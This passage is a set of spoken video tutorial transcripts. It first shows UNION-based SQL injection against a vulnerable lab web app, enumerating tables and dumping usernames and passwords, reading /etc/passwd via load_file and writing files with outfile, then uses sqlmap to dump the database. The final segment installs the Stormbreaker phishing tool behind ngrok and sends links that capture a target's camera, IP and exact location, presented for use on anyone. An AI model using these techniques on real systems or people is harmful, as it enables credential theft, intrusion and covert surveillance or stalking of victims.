me the user. In here if I give something else, so it will give me something else. So let's come right in here again, and I want to try to see what can I find, okay, to give to this. So instead of 1, I am going to give let me paste it once again in here, not this one, actually the whole thing, or we can just copy that. Okay, now instead of 4 and 5, I can add something else. So we have the 1. Okay, the 1, let that be there. Instead of 2, I can add the database. So, and then I will use a schema, and then for the next one, which is number 3, I need to add user. Okay, so let's see, do we get something or not? And also for the number 4, I want, for example, version, and for number 5 you can add something else. But now I'm going to just have this little thing, and I want to copy this and trying to paste it here. So right here, use Control V, and as you see we have this all here, and I'm going to add one more schema here and hit enter. Okay, what do we have here? So as you see right now, we have for number 2 we have VAPT. What was the number 2? Let me have that here so you can see. For number 2 we have database. The database is VAPT, as you see, user. So right now we are the root and localhost, add localhost. So we are the root user right now, okay, into this database. And the version, you see that the version is right in here. So the version is not too important for us. The thing which was very important was the database that we got, okay, the user that we got it here. So it is how you can use this little thing, okay, and get multiple things that even these things were not in our table. Maybe while we were checking it on the Metasploit or MySQL database, we were not able to see this. But now you see that we are able to see this and find them out. Okay, name of the database, which is very, very important now, and also the user. Okay, important things. So here you learn how you can use this little thing, okay, which is union, and we did it here. Okay, we can use this in many places. Okay, not just in SQL injection, and also of course in MySQL we know how to use it. Okay, a lot of places we can use it, and also in here you saw how to use it. It is a very simple example that you learn it and you can test it now here. Okay, so thanks for watching. Okay, now that we have name of the database, which is VAPT, I am sure we are able to get the information that is inside this database, like tables. Actually, all the tables we can get them, and let's see how we can do this. Okay, you see we have in the previous video I showed you we can use database, user, and version. It will give me the database, user, and the version that is here. And now in here I'm going to change this, and instead of database I'm going to use some other stuff, and I'm going to actually select the tables from information, what was that, information schema. So you will see that how we can use it. So if I use onion again and then select, let me change it. Okay, it's okay, select one, and then instead of database, if I add something like table underscore name, okay, table name, and instead of user, if I add just null, and instead of version again null, okay, and we have the 5 itself, okay, and in here I am going to tell this that select, let's see what do we have here. Okay, so at the end we don't need to add that schema. So in here I need to tell this that select all these things from that database that we had, okay, information schema dot tables. I think it was like this. So right now we are going to change this little query that we have, like database, user, version, and if I use select one and then name of the table, okay, table name, and then null, and instead of user I will use null, instead of version I will use null, and from information schema, you remember that this information schema, it was a database, a big database that store all the tables name inside it, and now I think we are able to select those tables from here too. Let's see if you are able to do this or not. Okay, and I am going to just copy this. Okay, I will copy this. Now use Control C, and coming here, let's remove this 5 up to here and use Control V. So we have union, select one, table name, and then null 5 from, okay, information schema dot tables. That is okay. So let's hit enter and see what do we get here. Okay, we don't have any kind of error here. As you see right now, result for 237 record found. As you see, we are successfully getting the username that was table name. Okay, so you see we are getting the table names like here, and these both are null. Because of that, these are null, so we are not getting anything. So you see we are getting column, profiling, routing, schema. What is this? Schemata or something? Tables, views, user. Let's find that thing that we were using. That was account, I think. So you see that we can find that too. Okay, accounts, and also we have credit cards. Okay, we were using account and credit cards using, I think, union. Okay, we could capture that. So it is how you can get all the tables name from database. Okay, so name of the database, it is information schema. So right now this the real database that we're using is OWASP 10, and from inside that OWASP 10, that all database from OWASP 10 is stored into information schema database. Okay, and also we are able to capture tables that is inside or information schema from OWASP 10. We can get them and we can see them right here. So it is not the only thing we can do. Okay, we can do more, like we can get information. Okay, a lot of things that we can do with this, and I will show you in the future how we can do all those kind of stuff. So thanks for watching, and I will see you in the next video. In the previous video, I showed you how to select all the tables from information schema, and you saw that we are able to see all the tables that are inside information schema. As you see, it is about 237. But now I am going to make it a little narrow and add a condition here to only select from the table from the database that we are using. Okay, so in here I am going to just add vir, and then that condition, which is going to be table schema. Okay, table schema is going to be equal to OWASP 10. So let's see and see what happened now. Use Control C, and let's come right over here, and I am going to just schema the tables. Okay, right here I'm going to Control V, use Control V, and then hit enter. So now that I hit enter, you see we get very few tables here. You see just 7 tables right now, and it is only the tables that are inside the OWASP 10 database. Okay, so like this we can narrow this, okay, and go inside each of them to get more information. And also, if you want, you can go inside this and select, for example, something just, for example, from accounts. Let's go and see how we can do that. So in here I am going to do this again. I'm going to select only the column names. Okay, like what is the column names? So right now you see these are the tables name. I'm going to select the column names. So again I use onion and then select. Okay, one is going to be always right in here, and then I'm going to use the column name. So column underscore name, and the next one is going to be null. The other one is also going to be null, and we have 5 from in here. Again, it's going to be information schema but not table. So information underscore schema dot not table. This time it's going to be column. Okay, so information schema dot column, and now we can add the next. Okay, where we have the before we had table schema, now we have table name. Okay, where table underscore name is equal to, for example, it is going to be accounts. Okay, so let me just use Control C here and then come, where is that? Let me find it. So that is here, and up to here. Use Control V and then hit enter. So when I hit enter, you see we get an error here, and it is telling me that executing table information schema dot column doesn't exist. Let's see the columns, and let me add an S here and hit enter. Okay, we still got that columns. So what do you think? What is the error? We have information schema dot columns. Okay, let's see. Where table name is equal to accounts, table name, that is okay. Schema information. Did you found it? I have a misspelling here. I need to add the R right in here. Now if I hit enter, you see that we get the result. That is very cool here. Okay, see, we have the first one right here, which is CID, the second one, which is username, and also we have the password, and we have my signature, and then is admin. So right now we are good to go. Okay, let me fix the other one that was in here. So we have information, okay, schema dot columns. We had an S here, and now it is time to do one more step here and select for example the sensitive data like username and password, and also is admin or my signature. So is it possible? Of course it is possible. Now I'm going to do this. Okay, so let's use again onion and then select, and then one is going to be always the same thing. Now instead of column name, I am going to just add the username, and instead of the null, I'm going to add password, and the next one I'm going to add is underscore admin. You see that right in here. Okay, we can add my signature, but it's better to add the other one. And so 1, 2, 3, and in number 5 we need to add the 5. Why? Because it is not showing me the number 5 here, so we are only able to see and edit or do something with this 3 thing that is here. So from information schema.column. Now instead of that, I am just going to tell this that from accounts, and we don't need all other things like where table is equal to something. We don't need them, we just need this one. So I will just copy this, and I am going to put this where that is necessary to be. Okay, that is here. So come on up to here, use Control V and then hit enter. So now that I hit enter, you see, very cool, the first one, which is admin. Okay, the password for admin is admin pass. This one, which is name@ is password, and the signature for that's okay, you know, that's my real account. And this is not the signature, actually it's the being admin or not. So it's true, false, and it shows me all the user details that is here. Okay, and for this one, you see we don't have anything like if he is admin or not. So now if I just use this one to log in, or this one, it's also an admin. Okay, and see if it is showing me or not. It's adrin, and the password is some password. If I hit enter, you see it is showing me the result for that. Okay, so the signature for that is zombie film rock. So perfect. Now we can get some sensitive information from the Git URL that is here. So thanks for watching. Okay, in this video I am going to show you how to read files and how to write in some files if you have the privilege, if you have the permission to do such a kind of thing like writing or bringing some change on a server. So let me go back to this file, okay, that we just had it. So in here I am going to show you first how to read a file. You may remember that file that we read, okay, that it contains all the password. It was stored in etc and then password, okay, like this. And today I'm going to show you how to read that file and also how to add some file into some places like. So let's again use this onion and then select one. What do you think about one? This time I don't want to use one, okay, I want to use null, and in the second option I want to use a function that is called load file, and here I want to load that file. That file is in etc and then password, okay, PASSWD, I think it is right, and all other is going to be null. So null, null, null. So let's count 1, this one, 2, 3, 4 and 5. So everything now looks good. I'm going to copy this and let's put this right here. Let's see what happens from accounts right here, okay. So let's use Control V and hit enter, and when I move down here you see that I have all the details that was inside that file into that is assigned to the username, okay. Now I can read all the things, which is very important, and in the files such a thing is very important. So now I have access to it, okay. I can read the files that is inside here. And also if you want to write into a file, you're also able to do that, but in most of the cases you are not allowed to use writing into databases or into the server. So by the way, I'm going to show you how you can do this. Again, we are going to use this onion select, and again right here we are going to write the first one as null, and then the second one we need to add a text. For example, I'm going to add Nemetila Ikhtiyari, okay, and then the second one is going to be null. The third one actually, it is going to be null, and all of them is going to be null, okay. 1, 2, 3 and then 4 and then 5. So I want to add into a file. So this file is I'm going to name it out file, not name it, okay, it's something you need to add it, okay, out file. And then the location of this file, for example, it's going to be in tmp temp, and then I'm going to name this like nemetila.txt, and let's copy this and paste it. Let's see if we have permission to add something into the tmp file, tmp folder, then it will work. If we don't have permission to do such a thing, then we are not going to be successful in this. So I'm again remove this, okay, up to here, okay, use Control V and then hit enter. So as you see right now, authentication error, bad user name or password. Now if I came right in here and let me exit it, clear it, ls, and I'm going to go to temp, it was temp I think, okay, not such a thing. Let me use city ls. Still we are here. Let's go to root. Okay, still we are in here. So when you find that folder, that means you're able to go inside that. Okay, we are into the root right now, you see. So we are into the root. How can I go in such a place? So if I go to city etc, if I hit enter, so I'm able to go into city etc. So I must be able to go right here. So if I use ls, you see that we are able to go inside temp to mp, and you see that nameatilla.txt is right here. So if I use cat and then nameatilla.txt, hit enter, you see that we have this one. Okay, and nameatilla ikhtiyari, that's something that is here. And also, as you see, the last thing that we had in our page or in our screen, it's also right in here, which is number 18. Let me hit control here to have my mouse. This one as well, nameatilla, this is my ID or password actually. Hello, this is my new account, and null, and like this. So this thing, which is nameatilla ikhtiyari, right now is stored into this txt file. Okay, so thanks for watching, and I will see you in the next video. Have you heard of sqlmap or not? In this video, I am going to give you a complete introduction about this sqlmap tool. It is a tool, it is actually a very big tool that it can be used with many databases. In here we are going to use it with SQL because our database is SQL. So by using these tools, we can we can find out if a website or if a database allowing us, or we are able to use some SQL injection on them or not. And also these tools allow you to do this SQL injection on there, or actually this tool itself can do this kind of thing for you. So let me search for sqlmap. sqlmap, you see that right here, and hit that enter. So you see we have opened this sqlmap, and that is here. So let's hit enter. What is it telling me? Please enter full target URL. That means it is asking me for a URL. Okay, so we provide the URL right in here, and then it will give you the full introduction about that. Okay, it will scan that URL and then give it to you. So here I am going to try to find a good URL. For example, it is going to be admin, and the password is, that it is admin pass. So hit view details. So it is right, okay, it's correct, and we are able to log in. It is giving me the information. So now I will just copy the URL from here and try to use that. So let's go to our terminal. In here I am going to just write sqlmap, and then use -u means the URL, and then put two double quotation mark here and paste the URL that you just had. Okay, now that I have my URL right in here, and now if I hit enter, it will start scanning this for me. So it is telling me, do you want to use those? What is that? Okay, you have not declared cookies while server wants to set its own. Do you want to use those? I will say no. And okay, so as you see, it is giving me the details like this, and it is telling me that parameter username, it is used get method, and also it is giving me some of the information that I need them. Okay, null. Okay, so we have those things, and in the back end it is telling me that it is used MySQL, and also the web server, it is Linux, Ubuntu, and web application technology is PHP, and also MySQL. this is the data that is fetched. And also mysqlmap, our version is outdated, no problem, that is going to work right now. So let's use this time yes here, and again it is giving me this. So right now you can like this, you can scan the website you want, but I want more details. So let me use sqlmap and then -- help. So let's see now what do we have here. When I use help, you see that it is giving me a lot of details here. The thing I need is in this part. So if I use A, it retrieves everything. Okay, so everything. Let's go with that. In here I just use A and hit enter. So this time yes, and this time you see it is giving me actually everything I need. And database management system user, you see this is the user. Okay, guest root, and so it is giving you everything: the current user, the host name, the current database, that is OWASP 10, actually everything. So let's use yes again and hit enter and enter. So everything. Okay, it will give you everything. When it will give you everything, that means everything. So I don't want to see everything right now, so I use Control C and clear this. I want to see some specific thing that I really want. So let's use again help here. So you see in here we have something like current user. If you want to see the current user, if you want to see the current database, if you want to see the password, if you see the databases, tables, columns, schema, dump all, and everything you want to see specifically, it will give you. So I want to see specifically what do I want. Okay, for example, I want to see the DBS, so I will just use with DBS and hit enter. So in here you will see that it is giving you all the databases that is inside this server. You see DBWA, information schema, Metasploit, mysql, OWASP 10, and TikiWiki 195. So it is how it is working. Okay, and let's see if we can find something else like tables of this thing. What happened? The tables of OWASP 10 or not. So let's go. Come on. Okay, so we have our databases. Now instead of using database, I will just use table. Okay, tables, and then I'm going to define the database name. It is going to be OWASP 10. Okay, OWASP 10. Hit enter and let's see. So right now you see it is giving me the all tables that belongs to OWASP 10. Okay, you see we have 6 tables right here, and we can see that. Okay, so in here like this we can get all the tables that is inside a database. Now it is time to go inside this and try to see, for example, I want to see what is inside this account table. Okay, the details which is inside account table, I want to see those things. Am I able or not? Let's go and see that. Okay, so now instead of table, I am going to give columns. Okay, so dash columns, and then the table is going to be, for example, accounts, and if you want you can give the database as well. So database is going to be OWASP. Okay, OWASP 10, and hit enter. So wait a moment, and then you will see that we have these columns inside the table of accounts. Okay, where is that? That is here. Okay, accounts. The database, it is OWASP 10 table, this one, and we have these columns inside here, and as you see we have their types too. So you see these are text, this is a varchar, and this one is integer. Good. And now it is time to go inside this and try to dump or try to see the information which is inside these columns. Okay, for example, I want to see the information that is inside account table. Let me use help once again. Okay, so it was sqlmap -- help, and now here you see we have dump as well. Okay, dump dbms database table entries. So by using this dump and also dump all, we will be able to get the information that is inside the table. Okay, for example, we have a table called accounts. I want to get all the information which is inside there and I want to see them. So let's see if you are able to do that or not. Again, I'm going to use sqlmap and then -u and then this thing. So I'm going to remove some of them. So I will remove the column now and I will just use the T, which is the table. The table is cons, and then the database, it is OWASP 10, and finally we got the dump. So now let's hit enter and see what do we get here. Okay, so as you see, we are able to get all the information that is inside this table. So as you see here, we have username, we have password, we have signature, we have is admin or not, we have CID, and everything that we need is here. So you have the username, name it, and then its password. You have admin, we have its password, and everything we want. So as you see, it is looks like a very complete tools for using this kind of thing. Okay, first you can test your target by using this. If they allow you to use SQL injection, then you can go and use SQL injection, or you can come right here and use sqlmap to do whatever you want. Okay, to get whatever you want, and like this you can do this. So thanks for watching, and I will see you. In this video, I'm going to show you how to use this Stormbreaker program. I am into its repository on GitHub. When we come here and see, this is the logo, and it is a screenshot of the output of the program. And also when we scroll down here, you see it is the process of installation on Kali Linux. And first, let me explain what really this program do. This program will allow you to get access to the camera, microphone, exact location of the person if they are online on internet in any point in any location in the world. Okay, you will send this kind of link to them, so they open it and you will get access to their camera or microphone or exact location. I'm going to come here and I will copy the first link, okay, the first command here, and I paste it in my terminal. So I use git to download this from its repository, okay, and hit enter. Provide the admin password, and this will install this Stormbreaker in my computer, and then I can use it. So as you see right now, the installation is completed. It is time to use cd Stormbreaker. If I use ls, right now you see we have install.sh here. So I'm going to use bash install.sh. As you see, it is asking me to run it as administrator, so I will use sudo at the beginning. So right now you see it start installing this in my laptop. The next command is to install some of the requirement that is necessary. I will copy the command and paste it here and hit enter. So this will install all the requirement that is necessary. And finally, we need to run that, okay, by using sudo python3 and st.py. Hit enter. So right now you see that the Stormbreaker is start working, And as you see, we have a web panel link. This is our web panel link or admin panel link that we can use it. And also it is asking me that please run ngrok on port 2525 and send the link to the target by using this command. Okay, it is time to go to another website called ngrok. Okay, so we need to come into this ngrok, and right in here we need to download this. Okay, so let's go to the download link, and from here and hit enter. So here we are going to download this for Linux. Okay, you see we have the download link here. I will provide the download link also in the description. You can use it, and you can hit this to be, so it will be downloaded in your machine. You can use it. Also, I'm going to use this link to install it in my machine. And let's come right here, and I'm going to paste the command here and hit enter. Provide the administrator password, and this will install this ngrok in my machine. The next thing is to sign up here. Okay, you need to sign up here. Signing up in this website is as easy as other website. You provide your name, your email, your password, and tick that I'm not a robot, accept the term and condition, and hit sign up. You will be having your account. I already have my account. I'm going to log in using my email address, using my password. Now you see I have logged into my account. You see we have a command here, run the following command to add your authentication to the default ngrok. I'm going to copy this from here, and I'm going to go back to my terminal, and you see that the ngrok is installed here. I will paste this here and hit enter. Authentication saved to configuration file in this location. That is cool, right? The next thing is to run the command that we have here. Okay, this command. So I will copy this, and then I will paste it here and hit enter. So let's see. Right now you see that we are successfully online, and we have this web interface that we can use. I will hit this. So this will open the web interface for me, the admin panel. I will copy this, and I'm going to open it in a new tab. Right now you see we have to go to this link. It is asking me to visit the site. I will hit that. Now we are having access to the admin panel. The username for admin is admin, and also the password is admin. Hit enter. Now we are successfully logged into this admin panel. You see we have all this link. The first one is a camera template, the second one is microphone, other one is near you, and also normal data. We have weather. This 3 is for accessing the location, and this 2 is, first one is accessing the camera, the second one is accessing the microphone. So let's go and have access to some of them. So I will use, for example, I will use this camera template, and I will run it, or I will open it in my Android phone, so to see if you're able to get access to the camera or not. As you see, it is the camera template, and I'm going to hit OK. And you see that it is asking me to allow to access my camera. And also in my laptop, you see that even if someone do not allow this, right now we got its IP, we got its operating system name, version, and also the browser name and location. Okay, time zone. And now I'm going to allow this. We have got an image here. Okay, so the image is saved in this location. This location is inside the Stormbreaker folder that we have it. Okay, into this Storm Web we have images folder, and as you see right now, this is capturing my image here that right now I am talking and my phone is right over here and it is capturing my image, as you see, the same as this one. So perfect. Right now we are able to capture or get access to the webcam. The next one is to get access to microphone, or let's go with location. So I will use this one to get access to the location of the person that I want. And I'm going to hit go here, and it is going to access this weather application. And you see that we have the weather application in my Android device. And if I wanted to change the location here, it will ask to allow your device location. So for example, I allow this. Okay, in my Windows system, you see again we got the information. Okay, and now that I allowed, it must give me something here. And as you see in my Android device, it is giving me thank you for taking interest in near you. This product is coming soon. So it is an error. Okay, it's showing that like this. So in my laptop right now, you see that we have a link here for Google Map. Okay, so I will copy this right now, and I'm going to open this in a new tab. Let's see that is it going to give me the exact location of the person or not. Oh my god. It is the exact location of my home. I am really surprised about this. My god. Just take a look at this. Perfect. Okay, this is my home. I am exactly located right in here. So it is about, I don't know, about 99.9% accurate. Okay, so it is how you can get access to someone's location, someone's camera, someone's microphone, and I hope you enjoyed this video.